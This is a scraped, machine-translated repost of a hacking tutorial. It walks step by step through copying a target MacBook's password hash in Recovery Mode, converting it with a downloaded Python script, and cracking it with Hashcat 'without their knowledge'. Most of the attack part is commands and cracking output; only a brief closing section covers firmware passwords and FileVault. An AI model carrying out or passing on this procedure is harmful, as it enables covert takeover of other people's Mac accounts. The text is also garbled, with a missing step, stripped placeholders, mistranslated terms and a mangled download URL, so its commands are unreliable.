قالب وردپرس درنا توس
Home / Tips and Tricks / How To Hack A Mac Password Without Changing It "Null Byte :: WonderHowTo

How To Hack A Mac Password Without Changing It "Null Byte :: WonderHowTo



A disabled MacBook can be compromised in less than three minutes. With a few commands, it is possible for an attacker to remove a target's loose hash and crack it without their knowledge.

The objective of this article is to acquire a .plist file that contains their hashed password. Then, using a Python script to convert the .plist file to a format that Hashcat can interpret, it is brutally forced to disclose the password. The easiest method for performing this attack requires physical access to MacBook, reset mode, USB flash drive, other MacBook and Hashcat dimensions.

You can also leave the USB flash drive and the attacker's MacBook instead of creating a temporary user on the MacBook's target where commands can be performed. The temporary user can then be deleted when it is completed. However, for this guide, we will show the USB flash drive method.

Buy USB Flash Drives on Amazon | Best Buy | Walmart

Recovery Mode is one of several boot modes supported by Mac devices. It contains a number of tools to reinstall MacOS, restore password for accounts, and configure a firmware password. While this feature was designed to help users lock their accounts and wipe the internal hard drive, they are often exploited by hackers trying to gain unauthorized access to sensitive files.

Since Mojave 10.14, macOS no longer allows users (not even root) to change .plist files that contain hashed passwords while running the operating system. These data can now only be acquired with recovery mode.

The USB flash drive is required to move the destination .plist file from the MacBook to the attacker. The USB flash drive used in this tutorial is FAT32 formatted, but NTFS and APFS formats will work as well.

There are some macOS-specific commands in the Python script that make it easy to convert .plist file to a format Hashcat can interpret. Therefore, another MacBook (or at least one other MacBook network account) is required.

To calculate the target's Mac password without changing it, the hash must be brutally forced and cracked. MacOS does an excellent job to secure the target password. You can not view user browsing in plain text. CPU-based cracking solutions (like JohnTheRipper) literally take decades to crack a single hash and are therefore not effective. Hashcat with a decent GPU is highly recommended.

Step 1: Enter Reset Mode

To access reset mode, first make sure that your MacBook is turned off completely. Then press the power button while holding Command + R on the keyboard. After about 30 seconds, the Apple logo and keys Command + R will be released. If the following screen appears, reset mode was enabled and readers can proceed to the next step in this guide.

Step 3: Remove the target plate

Insert the USB flash drive into the MacBook's dimensions. Wait a few seconds for it to be mounted automatically. Then copy the desired .plist file to the USB device using the command below cp . The .plist target will use the target username (eg, tokyoneon.plist).

  cp /Volumes//var/db/dslocal/nodes/Default/users/.plist / Volumes /  / 

Be sure to change in the above command. This is likely to be "macOS", but may be different if the target purchased the MacBook years ago and was upgraded to Mojave or High Sierra. In that case, the hard disk name may appear as "Macintosh HD" or any variation. Also, change to the USB flash drive on your MacBook.

That's it. The required file has been extracted, the MacBook can be turned off and the rest of the manual requires a separate MacBook owned by the attacker. If SIP was disabled in the previous step, enable it again before turning off with the command below.

  csrutil enable 

Step 4: Copy plot to the attack machine

Use the attacker's MacBook by inserting USB flash drive containing the .plist and copy of the destination ( cp ) to / tmp / catalog. / Tmp / directory is hard-coded in the Python script in the next step to make it generic enough for all readers to accompany. As long as the destination .plist file is in / tmp / directory, the Python script will be able to convert it to a hash.

  cp /Volumes//.plist / tmp / [19659032]   Step 5: Download and execute Hashdump Python Script 

The Python script used to convert the extracted .plist file to Hashcat's preferred format. was taken from the Empire Framework and is available at GitHub. Open a terminal and download the hashdump script with the following command curl . The argument -o will save the script with the filename "hashdump.py".

  curl & https://raw.githubusercontent.com/tokyoneon/hashdump.py/master/hashdump.py/master/hashdump.py&hl=en&hashddump.py 

Give the script permission to execute with the command chmod .

  chmod + x hashdump.py 

Finally, run the ishdump.py script with root privileges.

  sudo python hashdump.py

[('tokyoneon', '$ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c$88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8')] 

Delete text that surrounds isch (shown below) and save it to a file called "hash.txt." Next, move to hash.txt Hashcat machine

  ml $ $ $ 27,548 $ ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c 88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8 [19659032]   Step 6: .. Crack Hash [19659011] To crack the target hash Hashcat below uses command [19659019] hashcat -a 0 - m 7100 /path/to/hash.txt /path/to/wordlists/passwords.txt -w 4 --potfile-path /tmp/cracked_hash.pot

Help to the dictionary, or "straight mode" specified with the argument -a 0 . The macOS-specific hashing mode is enabled with the argument -m 7100 and is required for all macOS hackers extracted from version 10.8 or later. To improve Hashcat's overall performance, set -w (or --workload profile) to 4 to maximize crack speed. Finally, the argument - Potfile Path is used to save the cracked harrow to the specified file.

It is also possible to perform hybrid attacks where numeric combinations are added at the end of each word in the dictionary. For example, "password12" and "password77."

  hashcat-a 6-m 7100 / path / to / hash.txt /path/to/wordlists/everyword.txt? D? D -w 4 --potfile path /tmp/db.pot

The hybrid attack is activated with the argument -a 6 . This time, an "everyword" dictionary uses 479,000 English words in combination with ? D? D telling Hashcat to add each possible combination of two numbers to each password in the dictionary. To add three or four digits, use "? D? D? D" and "? D? D? D? D" respectively.

While Hashcat is running, the following data is displayed. If the password is guessed correctly, it will appear at the bottom of the terminal and Hashcat will stop.

  Session ..........: hashcat
Status ...........: Running
Hash.Type ........: macOS v10.8 + (PBKDF2-SHA512)
Hash.Target ......: $ ml $ 27548 $ ba6261885e349ecb847854136cf32e9561cd1af65 ... d41a42
Guess.Base .......: File (/root/wordlists/passwords.txt)
Guess.Queue ......: 1/1 (100.00%)
Speed.Dev. # 1 .....: 7740 H / s (98.63ms) @ Accel: 256 Slingor: 64 Thr: 512 Vec: 1
Recovered ........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress .........: 0/329968 (0.00%)
Rejected .........: 0/0 (0.00%)
Restore.Point ....: 0/329968 (0.00%)
Candidates. # 1 ....: 123456 -> zzzzzzzz9
HWMon.Dev. # 1 .....: Temp: 57c Fan: 31% Util: 100% Core: 1873MHz Mem: 3802MHz Bus: 16

[s] tatus [p] use [b] ypass [c] heckpoint [q] ut => 

Hash Cracking Considerations

It's hard to wonder how long a hash is going to crack. Dictionaries and hybrid attacks can take a varying time, based on a few factors.

  • Hash iterations - Not all macOS hashs are created equal. Hash iterations are used as a slowdown factor, which basically forces the CPU and GPU to take significantly longer when calculating a single password attempt. The number of iterations varied in my tests against Mojave and High Sierra. In some cases, iterations were set to 27,000. Other times, over 45,000. Whether this value is random or specific for each version of macOS is not clear from my test run. One thing is certain, the higher this value is, the longer Hashcat has to work to crack a single hash. Higher iterations can be the difference between 25,000 and only 1,000 password attempts per second. To identify the number of iterations used in the extracted .plist, take a look at the target's hash again (shown below). At the beginning of the hash, between second and third dollar characters ($), the number of iterations (27,548) can be found.
  $ ml $ 27548 $ ba6261885e ... 
  • GPU Model - With an old GeForce GTX 1060 graphics card and a hash of 27,548 iterations, it is possible to perform ~ 8,000 password attempts per second. The type of GPU used will drastically affect the overall performance of the attack. GPUs older than GTX 750ti are not recommended.

ASUS GeForce GTX 1060 6 GB Dual-Fan OC Edition Gaming Graphics Card at Amazon | Walmart

How to Protect yourself from Recovery Situation Attacks

There are some things that users can do to defend themselves against such attacks (see below). For general advice on macOS protection, check out " The Ultimate Guide to Hacking MacOS."

  • Enable password protection for firmware . To prevent the attacker from starting up in a live USB device, user mode or recovery mode, set a password for firmware. Firmware software will only require additional password at startup if someone tries to boot the MacBook in single user, boot manager, target disk or recovery methods. However, a firmware password alone does not protect the hard drive if the disc is physically removed from the MacBook. For more protection, enable encryption of the hard drive.
  • Enable FileVault Encryption . FileVault can be enabled by navigating to "System Settings", then "Security and Privacy" and clicking "Turn on FileVault" (you may need to unlock settings first). When done, MacBook restarts and requires a password to unlock the computer every time Mac starts. No account will be allowed to log in automatically and access to single user mode also requires a password. This is the best way to prevent attacks on the encrypted disk even if it is physically removed from your laptop. A complex passphrase of over 21 characters is recommended to protect against attacks with dedicated hard-wired hardware.

Do not Miss: The Ultimate Hacking MacOS Wizard

Cover Photo by Wes Hicks / Unsplash; screenshots of tokyoneon / Null Byte (unless otherwise stated)

Source link